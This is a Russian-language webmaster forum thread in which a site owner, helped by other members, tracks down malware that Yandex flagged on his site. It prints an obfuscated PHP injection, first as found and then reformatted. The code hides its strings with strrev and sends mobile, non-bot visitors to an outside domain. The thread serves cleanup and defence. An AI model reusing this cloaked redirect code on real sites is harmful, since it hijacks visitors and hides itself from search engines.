Помогите найти вирус

(Ответов: 15, Просмотров: 1611)
Страница 1 из 2 12 Последняя
  1. Опытный старожил) Аватар для vovasit91
    • Регистрация: 07.08.2011
    • Сообщений: 688
    • Репутация: 235
    • Webmoney BL: ?
    Помогите найти вирус на сайте
    Гугл ничего не видит. Яндекс же пишет что на сайте вирус
    http://tech2all.ru/articles/87-kak-p...mu-nomeru.html Поведенческий анализ
    Я просмотрел код и не увидел никакого вируса. До этого 2 года подряд ничего не было и тут вдруг на тебе. Подскажите хотя бы на какую строчку жалуется.
    Нод вирус тоже не видит. Левых айфреймов тоже не нашел.
    • 0
  2. Дипломник
    • Регистрация: 15.07.2013
    • Сообщений: 189
    • Репутация: 43
    • Webmoney BL: ?
    vovasit91, с посторонних сайтов ничего не грузится, яваскрипты внешне чистые. Я бы посоветовал проверить даты изменения скриптов на самом сайте. Ничего не модифицировалось за последнее время?
    • 0
  3. Опытный старожил) Аватар для vovasit91
    • Регистрация: 07.08.2011
    • Сообщений: 688
    • Репутация: 235
    • Webmoney BL: ?
    Я в html код не лазил несколько месяцев. Странный яндекс... Толи действительно вирус, то ли яндекс выеживается
    • 0
  4. Студент Аватар для SPQR
    • Регистрация: 11.02.2003
    • Сообщений: 42
    • Репутация: 18
    Внимательнее, ребята
    http://online3.drweb.com/cache/?i=df...d4d7596e62e667

    http://www.revisium.com/ai/ - для начала хватит.
    Если не вылечит - будем принимать более действенные методы.
    • 0
  5. Опытный Аватар для izyalex
    • Регистрация: 20.11.2012
    • Сообщений: 254
    • Репутация: 38
    • Webmoney BL: ?

    многа букаф


    error Blacklisted: Yes
    check Malware: No
    check Malicious javascript: No
    check Malicious iFrames: No
    check Drive-By Downloads: No
    check Anomaly detection: No
    check IE-only attacks: No
    check Suspicious redirections: No
    check Spam: No


    Domain blacklisted By Yandex (via Sophos): tech2all.ru
    [свернуть]

    Исходя из этого, на сайте вредоносного тела уже нет. Видимо Вы его уже вичистили, но сайт остался в блек листах яндекса.
    В вебмастер инструментах Я поставьте на перепроверку, и ждите, примерно от 12 до 48 часов пересканируют.
    Сpanel хостинг и ISPmanager хостинг от 119р./мес
    VIP Премиум хостинг в Москве, 1000р./мес и не парюсь
    • 0
  6. Опытный старожил) Аватар для vovasit91
    • Регистрация: 07.08.2011
    • Сообщений: 688
    • Репутация: 235
    • Webmoney BL: ?
    Цитата Сообщение от izyalex Посмотреть сообщение
    Исходя из этого, на сайте вредоносного тела уже нет. Видимо Вы его уже вичистили, но сайт остался в блек листах яндекса. В вебмастер инструментах Я поставьте на перепроверку, и ждите, примерно от 12 до 48 часов пересканируют.
    Поставил на перепроверку: итог вирус все равно есть...

    ---------- Сообщение добавлено 20:39 ---------- Предыдущее 20:14 ----------

    Нашел вредоносный код

    Код HTML:
    $gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];
    if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) {
    if((preg_match('/ndroi|htc_|htc-|okia|pera min|j2me|martph|pera mo|peramob|ymbian/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/')) 
    {header(strrev('=REREFER_PTTH&1=ru&5?bus'.'/artemed/'.'tneilc'.'/ten.'.'yr'.'ga'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}
    Граждане программаторы, расскажите что это за код такой
    • 0
  7. Опытный Аватар для izyalex
    • Регистрация: 20.11.2012
    • Сообщений: 254
    • Репутация: 38
    • Webmoney BL: ?
    Перенаправляет с поисковиков и мобильников на закодированную ссылку через strrev.

    более понятный код

    PHP код:
    $gant strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth')) ]);
    $ref $_SERVER[strrev(strtoupper('tsoh_ptth')) ];

    if (!
    preg_match('/crawl|andex|oogle|bot/i'$gant))
        {
        if ((
    preg_match('/ndroi|htc_|htc-|okia|pera min|j2me|martph|pera mo|peramob|ymbian/i'$gant)) and (!isset($_COOKIE['dle_user_id'])) and ($_SERVER['REQUEST_URI'] != '/'))
            {
            
    header(strrev('=REREFER_PTTH&1=ru&5?bus' '/artemed/' 'tneilc' '/ten.' 'yr' 'ga' '//:pt' 'th :noi' 'tac' 'oL') . $ref);
            exit;
            }
        } 
    [свернуть]

    Нужно искать по файлам шеллы, и вставки лишнего кода чистить.
    Сpanel хостинг и ISPmanager хостинг от 119р./мес
    VIP Премиум хостинг в Москве, 1000р./мес и не парюсь
    • 1

    Спасибо сказали:

    vovasit91(14.09.2013),
  8. Студент Аватар для voffka
    • Регистрация: 16.02.2011
    • Сообщений: 57
    • Репутация: 11
    Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)):
    У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.
    • 0
  9. Дипломник
    • Регистрация: 15.07.2013
    • Сообщений: 189
    • Репутация: 43
    • Webmoney BL: ?
    Цитата Сообщение от vovasit91 Посмотреть сообщение
    strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))])
    Ух ты, я еще такого не видел - прячут код через обратное написание.

    Как написали предыдущие ораторы - ищите лазейку, через которые вам меняют скрипты. Бывает - шелл видно явно, бывает - прячут в какую-нибудь картинку, бывает - через фтп и т.д.

    Если есть родная версия сайта (точно без вирусов), можно сделать пофайловое сравнение. В-общем, пробуйте. Могу предложить свою помощь.
    • 0
  10. Дипломник Аватар для terrik
    • Регистрация: 21.12.2010
    • Сообщений: 196
    • Репутация: 38
    ТС, в каком именно файле нашли этот код?
    • 0
Страница 1 из 2 12 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Вирус на сайте! Помогите!
DLE 4 13.09.2013 20:41
Вирус на сайте, помогите!
DLE 3 12.09.2013 22:12
Помогите удалить вирус
Вопросы от новичков 4 18.03.2013 22:02
Помогите найти где находится вирус, или как его код выглядит
Консультации по безопасности 6 08.02.2013 11:01
Ребят помогите. Вирус на сайте
Прочее 0 06.02.2011 04:36

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры